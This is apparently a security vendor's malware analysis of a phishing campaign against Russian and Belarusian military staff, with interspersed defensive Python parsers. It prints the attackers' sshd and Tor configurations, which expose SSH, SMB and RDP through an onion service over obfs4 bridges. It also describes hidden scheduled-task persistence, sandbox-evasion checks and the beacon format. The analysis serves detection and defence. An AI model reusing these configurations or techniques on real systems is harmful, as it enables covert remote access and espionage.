    Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus


    Authors: Sathwik Ram Prakki and Kartikkumar Jivani 

    Contents 

    • Introduction 
    • Key Targets 
      • Industries 
      • Geographical Focus 
    • Infection and Decoys 
    • Technical Analysis 
      • PowerShell Stage 
      • Persistence 
      • Configuration 
    • Infrastructure and Attribution 
    • Conclusion 
    • SEQRITE Protection 
    • IOCs 
    • MITRE ATT&CK 

    Introduction 

    SEQRITE Labs has identified a campaign targeting military personnel of both Russia and Belarus, in particular the Russian Airborne Forces and the Belarusian Special Forces. The infection chain ends by exposing multiple local services over Tor using obfs4 bridges, allowing the attacker to communicate anonymously through an onion address. In this blog we walk through the infection chain, which proceeds through multiple PowerShell stages, the decoys used to lure victims, and how SSH is exposed as a Tor hidden service, with obfs4 bridges to get Tor traffic past blocking, while persistence is maintained. 

    Multiple campaigns with a similar geographical focus have been identified this year, such as HollowQuill in early 2025, which targeted various Russian entities including academic and research institutes directly linked to the government and defence sectors. In July we encountered another campaign, dubbed CargoTalon, which targeted Russia's aerospace and defense sectors with the Eaglet implant and showed overlaps with the HeadMare group. More recently, the targeting of Russia's automobile and e-commerce industries with the CAPI Backdoor has been tracked as operation MotorBeacon. 

    Key Targets 

    Industries 

    Geographical Focus 

    • Russian Federation 
    • Republic of Belarus 

    Infection and Decoys 

     

    Fig. 1 – Infection Chain 

    The first lure is a nomination letter from the acting commander of Military Unit 71289, which refers to the 83rd Separate Guards Airborne Assault Brigade stationed in Ussuriysk (Eastern Military District), addressed to the Chief of the Russian Airborne Forces (VDV) regarding the appointment of military personnel. Ussuriysk lies on the opposite side of the country from the ongoing Russia-Ukraine war, close to both the China-Russia border and the Pacific Ocean. 

    Fig. 2 – Decoy targeting Russia 

    The second decoy letter concerns the training of military personnel from October 13th to 16th, 2025 at Military Unit 89417, which refers to the 5th Separate Spetsnaz Brigade of the Belarusian Special Forces located in Maryina Horka near Minsk (reports suggest the unit was disbanded in 2019, but some activity was seen in 2021). 


    Fig. 3 – Decoy targeting Belarus 

    Technical Analysis 

    The archive files were uploaded from Belarus and carry modification dates of 2025-Oct-15 and 2025-Oct-21. Each initial phishing ZIP contains a shortcut (LNK) with a double extension; the filenames translate as follows: 

    Original filename | Translated name 
    ТЛГ на убытие на переподготовку.pdf.lnk | TLG departure for retraining.pdf.lnk 
    Исх №6626 Представление на назначение на воинскую должность.pdf.lnk | Ref. No. 6626 Nomination for appointment to military position.pdf.lnk 

    The shortcut files carry the machine IDs ‘desktop-V7i6LHO’ and ‘desktop-u4a2HgZ’ and appear to have been weaponized in the last week of September 2025. They trigger PowerShell commands that act as the initial dropper stage, using another archive file placed beside the LNK to set up the entire chain. 

    Fig. 4 – Shortcut file triggers PowerShell 

    The command extracts the first archive file into one of the following directories: 

    • %APPDATA%\dynamicUpdatingHashingScalingContext 
    • %USERPROFILE%\Downloads\incrementalStreamingMergingSocket 

    and then uses it to extract the second archive file from the folder ‘FOUND.000’. This multi-stage extraction drops the payloads into either the ‘$env:APPDATA\logicpro’ or the ‘$env:APPDATA\reaper’ directory, reads the contents of one of the following text files and executes it silently in a hidden PowerShell process: 

    • \logicpro\scalingEncryptingEncoding 
    • \reaper\responsiveHashingSocketScalableDeterministic 

    Before jumping into the next stage, let’s look at the contents of both archives. They contain multiple EXEs and text files, the decoy PDF, a DLL, and a couple of XML files. Following the chain above, the next stage is execution of the PowerShell script. 

    Fig. 5 – Contents of archive files 

    PowerShell Stage 

    The script starts by checking whether the Windows ‘Recent’ folder contains more than ten shortcut files. This is an anti-analysis check meant to evade sandbox environments by confirming that there has been normal user activity. A second check requires the running process count to be greater than 50; the script then opens the decoy document. 

    Fig. 6 – PowerShell anti-analysis 

    It then creates a mutex to ensure that only one instance is running. It reads both XML files, substitutes the current username, and registers them as scheduled tasks that start immediately. This establishes persistence and launches the next-stage payloads defined in those XMLs. The full onion address is assembled by concatenating multiple strings. 

    Fig. 7 – PowerShell stager 

    It then waits for the hostname file to exist; Tor writes this file into the hidden service directory named in its configuration, so the wait ends only once the local Tor instance is up and the onion address is available. The script builds an identification beacon of the form ‘<username>:<onion-address>:3-yeeifyem’ (or ending in ‘:2-lrwkymi’) and sends it with curl through the local Tor SOCKS listener on port 9050. Multiple retry flags are used to make the beaconing persistent. 

    Fig. 8 – local hostname for beacon 
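    A hunt-side check for the beacon format described above, added here as an example and not code from the write-up: it parses ‘<username>:<onion-address>:<tag>’ strings and also validates the v3 onion address checksum, so that malformed or mistyped addresses in string dumps do not become false hits. The username is a constructed placeholder; the first onion address is the one reported in this post, the second is generated from a dummy key.

```python
import base64
import hashlib
import re

# Beacon layout reported above: <username>:<onion-address>:<tag>, where the
# tag is either "3-yeeifyem" or "2-lrwkymi".
BEACON_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<onion>[a-z2-7]{56})\.onion:(?P<tag>3-yeeifyem|2-lrwkymi)$"
)
CHECKSUM_PREFIX = b".onion checksum"
V3_VERSION = b"\x03"


def onion_v3_checksum_ok(addr56: str) -> bool:
    """A v3 address is base32(pubkey[32] || checksum[2] || version[1]) where
    checksum = sha3_256(".onion checksum" || pubkey || version)[:2]."""
    try:
        raw = base64.b32decode(addr56.upper())
    except ValueError:
        return False
    if len(raw) != 35 or raw[34:] != V3_VERSION:
        return False
    expected = hashlib.sha3_256(CHECKSUM_PREFIX + raw[:32] + V3_VERSION).digest()[:2]
    return raw[32:34] == expected


def make_v3_onion(pubkey: bytes) -> str:
    """Build a checksum-valid v3 address from a 32-byte key (test data only)."""
    checksum = hashlib.sha3_256(CHECKSUM_PREFIX + pubkey + V3_VERSION).digest()[:2]
    return base64.b32encode(pubkey + checksum + V3_VERSION).decode().lower()


def parse_beacon(line: str):
    """Return the beacon fields, or None when the line is not a beacon."""
    m = BEACON_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "onion": m["onion"], "tag": m["tag"],
            "valid_onion": onion_v3_checksum_ok(m["onion"])}


# Constructed sample lines (placeholder username; the first onion is the one
# reported in this post, the second is generated from a dummy key).
SAMPLE_LINES = [
    "user01:yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd.onion:3-yeeifyem",
    "user01:" + make_v3_onion(b"\x41" * 32) + ".onion:2-lrwkymi",
    "user01:notanonion.onion:3-yeeifyem",
]


def find_beacons(lines):
    return [b for b in map(parse_beacon, lines) if b]
```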

    Persistence 

    The XML files are Windows scheduled task definitions that run daily starting at 2025-09-25T01:41:00-08:00 and also carry a logon trigger for the specified user. The tasks are hidden and configured to run even when the computer is idle, on demand, and without network connectivity. They ignore additional instances and have no execution time limit. 

    Fig. 9 – XML for persistence 

    Fig. 10 – Scheduled Task 
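    A triage routine for the scheduled-task traits listed above, added here as an example (not the campaign's XML or the authors' code): it scores a Task Scheduler definition for the hidden flag, logon trigger, unlimited execution time, IgnoreNew policy, no-network execution and a command under the user profile. The task XML is constructed from the described settings, with a placeholder user.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition modelled on the traits described above
# (placeholder user; not the XML recovered from the campaign).
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-09-25T01:41:00-08:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
    <LogonTrigger><UserId>HOST\\user01</UserId></LogonTrigger>
  </Triggers>
  <Settings>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  </Settings>
  <Actions><Exec>
    <Command>%AppData%/logicpro/githubdesktop.exe</Command>
    <Arguments>-f controllerGatewayEncrypting</Arguments>
  </Exec></Actions>
</Task>"""


def triage_task(xml_text: str) -> dict:
    """Score a Task Scheduler XML against the traits seen in this campaign."""
    root = ET.fromstring(xml_text)

    def text(path: str) -> str:
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    command = text("t:Actions/t:Exec/t:Command")
    checks = [
        ("hidden task", text("t:Settings/t:Hidden").lower() == "true"),
        ("logon trigger", root.find("t:Triggers/t:LogonTrigger", NS) is not None),
        ("no execution time limit (PT0S)", text("t:Settings/t:ExecutionTimeLimit") == "PT0S"),
        ("ignores additional instances", text("t:Settings/t:MultipleInstancesPolicy") == "IgnoreNew"),
        ("runs without network", text("t:Settings/t:RunOnlyIfNetworkAvailable").lower() == "false"),
        ("command under user profile (AppData)", "appdata" in command.lower()),
    ]
    findings = [name for name, hit in checks if hit]
    return {"command": command, "arguments": text("t:Actions/t:Exec/t:Arguments"),
            "start": text("t:Triggers/t:CalendarTrigger/t:StartBoundary"),
            "findings": findings, "score": len(findings)}
```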

    Finally, the EXEs receive configuration files as arguments; based on PDB paths and internal names, some are most likely SSH and SFTP server binaries. The XML files trigger either the first two or the last two of the following commands (both campaigns included): 

    • %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting 
    • %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster 
    • %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession 
    • %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant 

    Both githubdesktop.exe and googlemaps.exe from the list above, along with ssh-shellhost.exe, ebay.exe (the SFTP server) and libcrypto.dll (LibreSSL), are legitimate “OpenSSH for Windows” binaries with a compilation timestamp of 2023-12-13 and the following PDB paths: 

    • C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb 
    • C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb 
    • C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb 
    • C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb 

    libcrypto.dll is bundled for encryption, key exchange and hashing, whereas ssh-shellhost.exe handles interactive SSH sessions. This confirms that the attacker deploys a self-contained OpenSSH server inside the user’s profile directory and reaches it over Tor, most likely for stealthy remote administration and post-exploitation persistence. 

    Configuration 

    The first configuration file is passed to sshd (githubdesktop.exe or googlemaps.exe); the only difference between the two campaigns is that the sftp subsystem is absent in the second. It binds the non-standard port 20321 on the loopback interface, disables password authentication and allows public-key authentication only, referencing files that hold the host private key and the authorized public keys. The key files are: 

    • redundantOptimizingInstanceVariableLogging 
    • redundantExecutingContainerIndexing 
    • incrementalMergingIncrementalImmutableProtocol 
    • loggingOptimizedDecoding 

    The configuration passed to sshd reads: 

    Port 20321 
    ListenAddress 127.0.0.1 
    HostKey redundantOptimizingInstanceVariableLogging 
    PubkeyAuthentication yes 
    PasswordAuthentication no 
    AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing 
    Subsystem sftp AppData\Roaming\logicpro\ebay.exe 

    The second configuration is passed to pinterest.exe (or googlesheets.exe), which is simply tor.exe. It creates an onion service that exposes SSH, SMB, RDP and other local ports over Tor. Tor is configured to use the obfs4 pluggable transport through an EXE named confluence.exe (or rider.exe), which is an obfs4proxy binary, and to use bridges in order to hide its connections. Each bridge endpoint is defined with IP, port, fingerprint, cert and iat-mode, allowing outbound Tor connections through those bridges. 

    Fig. 11 – Communication with Tor bridges 

    HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" 
    HiddenServicePort 20322 127.0.0.1:20321 
    HiddenServicePort 11435 127.0.0.1:445 
    HiddenServicePort 13893 127.0.0.1:3389 
    HiddenServicePort 12192 127.0.0.1:12191 
    HiddenServicePort 14763 127.0.0.1:14762 
    GeoIPFile geoip 
    GeoIPv6File geoip6 
    
    ClientTransportPlugin obfs4 exec confluence.exe  
    UseBridges 1 
    Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 
    Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2 

    In the same way, the legitimate obfs4proxy.exe is renamed to confluence.exe or rider.exe and referenced under that name in the configuration. 
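    As an added example (not part of the original analysis or the authors' tooling), the check below reads the two configuration excerpts quoted above and reports which local services the onion service forwards to, whether the transport plugin binary is renamed, and the parsed bridge records. The excerpts are constructed copies with the bridge cert= values omitted.

```python
import re

# Constructed copies of the sshd and tor configuration excerpts quoted above
# (bridge cert= values omitted); example code, not the authors' tooling.
SSHD_CONFIG = """Port 20321
ListenAddress 127.0.0.1
HostKey redundantOptimizingInstanceVariableLogging
PubkeyAuthentication yes
PasswordAuthentication no"""

TORRC = """HiddenServicePort 20322 127.0.0.1:20321
HiddenServicePort 11435 127.0.0.1:445
HiddenServicePort 13893 127.0.0.1:3389
ClientTransportPlugin obfs4 exec confluence.exe
UseBridges 1
Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=OMITTED iat-mode=2
Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=OMITTED iat-mode=2"""


def parse_kv(text):
    """Yield (keyword, rest) for each non-blank, non-comment config line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, rest = line.partition(" ")
            yield key, rest.strip()


def triage(sshd_text, torrc_text):
    sshd = dict(parse_kv(sshd_text))
    ssh_port = int(sshd.get("Port", "22"))
    sensitive = {ssh_port: "SSH", 445: "SMB", 3389: "RDP"}  # local ports worth flagging
    findings, bridges = [], []
    for key, rest in parse_kv(torrc_text):
        if key == "HiddenServicePort":          # <virtport> <host:port>
            virt, target = rest.split()
            host, _, port = target.rpartition(":")
            if int(port) in sensitive:
                findings.append(f"onion:{virt} -> {host}:{port} ({sensitive[int(port)]})")
        elif key == "ClientTransportPlugin":    # <transport> exec <binary>
            m = re.match(r"(\S+)\s+exec\s+(\S+)", rest)
            if m and "obfs4proxy" not in m.group(2).lower():
                findings.append(f"{m.group(1)} plugin runs as renamed binary {m.group(2)}")
        elif key == "Bridge":                   # <transport> <ip:port> <fingerprint> k=v ...
            transport, endpoint, fp, *params = rest.split()
            bridges.append({"transport": transport, "endpoint": endpoint, "fingerprint": fp,
                            "params": dict(p.split("=", 1) for p in params)})
    if sshd.get("PasswordAuthentication", "yes") == "no" and sshd.get("PubkeyAuthentication") == "yes":
        findings.append(f"key-only sshd listening on {sshd.get('ListenAddress', '*')}:{ssh_port}")
    return {"findings": findings, "bridges": bridges}
```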

    Infrastructure and Attribution 

    The onion address used to register the victim over Tor is: 

    • yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    Recent netflow data for these Tor bridge ports shows traffic with Russia and even a few neighboring nations. The IPs are categorized as either Tor service or residential. 

    IP:Port | ASN | Country | Category 
    77.20.116[.]133:8080 | 3209 (Vodafone GmbH) | Germany | residential, proxy 
    156.67.24[.]239:33333 | 51167 (Contabo GmbH) | France | tor 
    146.59.116[.]226:50845 | 16276 (OVH SAS) | Poland | cloud 
    142.189.114[.]119:443 | 577 (BACOM) | Canada | - 

    Very little traffic is seen on 156.67.24[.]239:33333 and 77.20.116[.]133:8080, whereas Russian traffic is seen on the remaining two IPs, which belong to the configuration and decoys targeting Russia. 

    Two Russian-linked groups, APT44 (Sandworm) and APT28, have previously been observed using Tor to communicate with onion domains. In this case, however, custom configurations for the pluggable transport and sshd are used in an attempt to evade network monitoring, and the attacks target Russia and Belarus. Similar targeting has been conducted by the pro-Ukraine APTs Angry Likho (Sticky Werewolf) and Awaken Likho (Core Werewolf), but SkyCloak remains unattributed for now. 

    Conclusion 

    A multi-stage intrusion chain has been identified targeting both Russian and Belarusian military personnel; it leads to a PowerShell stager that deploys OpenSSH and Tor with obfs4 bridges. This indicates a stealth-oriented campaign designed to establish covert remote access and enable lateral movement within targeted environments. Based on current evidence, the campaign appears consistent with Eastern European-linked espionage activity against defense and government sectors, though attribution to previously documented operations remains low-confidence. 

    SEQRITE Protection 

    • XML.Skycloak.50052.GC 
    • SCRIPT.Trojan.50053.GC 
    • SCRIPT.Skycloak.50054 

    IOCs 


    MITRE ATT&CK 

    Tactic | Technique ID | Technique Name 
    Resource Development | T1583 | Acquire Infrastructure 
    Initial Access | T1566.001 | Phishing: Spearphishing Attachment 
    Execution | T1204.002 | User Execution: Malicious File 
     | T1059.001 | Command and Scripting Interpreter: PowerShell 
     | T1106 | Native API 
    Persistence | T1053.005 | Scheduled Task 
     | T1547 | Boot or Logon Autostart Execution 
     | T1027 | Obfuscated Files or Information 
    Defense Evasion | T1036 | Masquerading 
     | T1497 | Virtualization/Sandbox Evasion 
    Discovery | T1083 | File and Directory Discovery 
     | T1046 | Network Service Discovery 
     | T1033 | System Owner/User Discovery 
    Lateral Movement | T1021 | Remote Services 
    Collection | T1119 | Automated Collection 
    Command and Control | T1071 | Application Layer Protocol 
     | T1090 | Proxy 
     | T1571 | Non-Standard Port 
    Exfiltration | T1041 | Exfiltration Over C2 Channel 

     


